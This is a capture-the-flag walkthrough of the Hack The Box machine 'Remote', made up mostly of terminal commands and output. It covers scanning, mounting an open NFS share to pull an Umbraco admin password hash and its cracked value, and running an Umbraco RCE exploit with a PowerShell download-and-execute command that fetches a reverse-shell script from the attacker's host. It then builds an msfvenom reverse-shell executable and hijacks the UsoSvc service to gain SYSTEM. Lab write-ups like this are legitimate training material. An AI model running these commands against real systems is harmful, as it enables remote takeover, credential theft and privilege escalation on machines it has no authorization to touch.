NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 13:36 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating Ping Scan at 13:36
Scanning 10.10.10.180 [4 ports]
Completed Ping Scan at 13:36, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:36
Completed Parallel DNS resolution of 1 host. at 13:36, 0.18s elapsed
Initiating SYN Stealth Scan at 13:36
Scanning 10.10.10.180 [1000 ports]
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Completed SYN Stealth Scan at 13:36, 2.35s elapsed (1000 total ports)
Initiating Service scan at 13:36
Scanning 7 services on 10.10.10.180
Completed Service scan at 13:37, 64.48s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.180
Retrying OS detection (try #2) against 10.10.10.180
Initiating Traceroute at 13:37
Completed Traceroute at 13:37, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:37
Completed Parallel DNS resolution of 2 hosts. at 13:37, 0.20s elapsed
NSE: Script scanning 10.10.10.180.
Initiating NSE at 13:37
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 13:37, 10.39s elapsed
Initiating NSE at 13:37
Completed NSE at 13:38, 69.27s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Aggressive OS guesses: Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-22T08:12:25
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 427.21 ms 10.10.14.1
2 427.21 ms 10.10.10.180
NSE: Script Post-scanning.
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Initiating NSE at 13:38
Completed NSE at 13:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.04 seconds
Raw packets sent: 1282 (57.820KB) | Rcvd: 1205 (49.548KB)
ENUMERATING PORTS
FTP
WEBSITE
lets use gobuster against this
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #gobuster dir -u http://10.10.10.180/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.180/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/22 13:56:20 Starting gobuster
===============================================================
/blog (Status: 200)
/Blog (Status: 200)
/home (Status: 200)
/Home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/People (Status: 200)
/person (Status: 200)
/products (Status: 200)
/Products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/06/22 13:59:46 Finished
===============================================================
WEBSITE UMBRACO DIRECTORY
but we need username and password for this !!
PORT 111 MOUNT
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
mount.nfs: mount point ./mount does not exist
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mkdir mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
──╼ #cd mount
┌─[root@liquid]─[~/Desktop/HTB/remoteC/mount]
└──╼ #ls
App_Browsers App_Plugins bin css Global.asax scripts Umbraco_Client Web.config
App_Data aspnet_client Config default.aspx Media Umbraco Views
Here we will grab our password for umbraco logins
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1″}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
admin@htb.local : baconandcheese
GETTING USER ACCESS
Exploit od umbraco
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8000/reverseps.ps1')"
Netcat Listener
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689
PS C:\windows\temp> whoami
iis apppool\defaultapppool
PS C:\windows\temp>
lets get cmd first CMD.EXE
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49754
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\windows\temp>whoami \priv
whoami \priv
ERROR: Invalid argument/option - '\priv'.
Type "WHOAMI /?" for usage.
C:\windows\temp>whoami
whoami
iis apppool\defaultapppool
C:\windows\temp>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\windows\temp>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.
C:\windows\temp>systeminfo
systeminfo
Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 6/22/2020, 2:27:18 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,572 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,229 MB
Virtual Memory: In Use: 1,570 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4462930
[03]: KB4516115
[04]: KB4523204
[05]: KB4464455
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.180
[02]: fe80::4d8:24d5:55c2:7def
[03]: dead:beef::4d8:24d5:55c2:7def
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\windows\temp>
GETTING ROOT ACCESS
Lets create exe which will get us administrator access
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.12 lport=9004 -f exe > liquid.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Now upload this to temp directory
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689
PS C:\windows\system32\inetsrv> cd ../../temp
PS C:\windows\temp> invoke-webrequest -Uri http://10.10.14.12:8000/liquid.exe -OutFile liquid.exe
Now here you just have to stop the UsoSvc service then you have to set its path to your own malicious exe which will trigger the exe payload to get you a reverse shell by adminIstrator after starting the service
┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49687
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\windows\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\windows\temp
06/22/2020 05:06 AM <DIR> .
06/22/2020 05:06 AM <DIR> ..
06/22/2020 03:55 AM <DIR> DiagTrack_alternativeTrace
06/22/2020 03:55 AM <DIR> DiagTrack_aot
06/22/2020 03:55 AM <DIR> DiagTrack_diag
06/22/2020 03:55 AM <DIR> DiagTrack_miniTrace
06/22/2020 05:06 AM 73,802 liquid.exe
06/22/2020 05:05 AM 91,724 MpCmdRun.log
02/23/2020 03:20 PM 109,064 MpSigStub.log
06/22/2020 05:04 AM 45,272 nc.exe
06/22/2020 04:55 AM 102 silconfig.log
03/18/2020 04:45 PM <DIR> vmware-SYSTEM
03/18/2020 04:45 PM 27,136 vmware-vmsvc.log
02/27/2020 10:45 AM 10,823 vmware-vmusr.log
06/22/2020 04:55 AM 960 vmware-vmvss.log
8 File(s) 358,883 bytes
7 Dir(s) 19,409,739,776 bytes free
C:\windows\temp>sc stop usosvc
sc stop usosvc
SERVICE_NAME: usosvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
C:\windows\temp>sc config usosvc binpath="c:\windows\temp\liquid.exe"
sc config usosvc binpath="c:\windows\temp\liquid.exe"
[SC] ChangeServiceConfig SUCCESS
C:\windows\temp>sc start usosvc
sc start usosvc
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\windows\temp>
Here in netcat we will get our shell
┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd ../../Users/Administrator/Desktop
cd ../../Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9545907ad***********************
C:\Users\Administrator\Desktop>cd ../../Public/Desktop
cd ../../Public/Desktop
C:\Users\Public\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users\Public\Desktop
02/20/2020 03:14 AM 1,191 TeamViewer 7.lnk
1 File(s) 1,191 bytes
0 Dir(s) 19,409,514,496 bytes free
C:\Users\Public\Desktop>cd ..
cd ..
C:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of C:\Users\Public
02/20/2020 03:42 AM <DIR> .
02/20/2020 03:42 AM <DIR> ..
02/19/2020 04:03 PM <DIR> Documents
09/15/2018 03:19 AM <DIR> Downloads
09/15/2018 03:19 AM <DIR> Music
09/15/2018 03:19 AM <DIR> Pictures
06/22/2020 04:56 AM 34 user.txt
09/15/2018 03:19 AM <DIR> Videos
1 File(s) 34 bytes
7 Dir(s) 19,409,514,496 bytes free
C:\Users\Public>type user.txt
type user.txt
0653c**************************
C:\Users\Public>
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
